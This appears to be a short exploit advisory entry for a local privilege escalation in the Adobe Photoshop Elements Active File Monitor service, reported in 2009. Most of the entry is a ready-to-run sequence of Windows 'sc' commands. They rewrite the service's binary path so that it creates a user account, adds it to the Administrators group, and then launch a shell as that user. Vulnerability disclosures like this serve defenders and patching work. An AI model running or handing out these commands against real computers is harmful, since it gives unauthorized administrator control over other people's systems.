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Adobe Photoshop Elements - Active File Monitor Service Privilege Escalation

🗓️ 29 Oct 2009 00:00:00Reported by bellickType 
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Adobe Photoshop Elements - Active File Monitor Service Privilege Escalation. Attackers need local interactive access to exploit. Example commands incl. adding user to Administrators group

Code
To exploit this issue, attackers require local, interactive access to an affected computer.

The following example commands are available:

sc stop "AdobeActiveFileMonitor8.0"
sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /add"
sc start "AdobeActiveFileMonitor8.0"
runas /noprofile /user:%COMPUTERNAME%\adobe cmd

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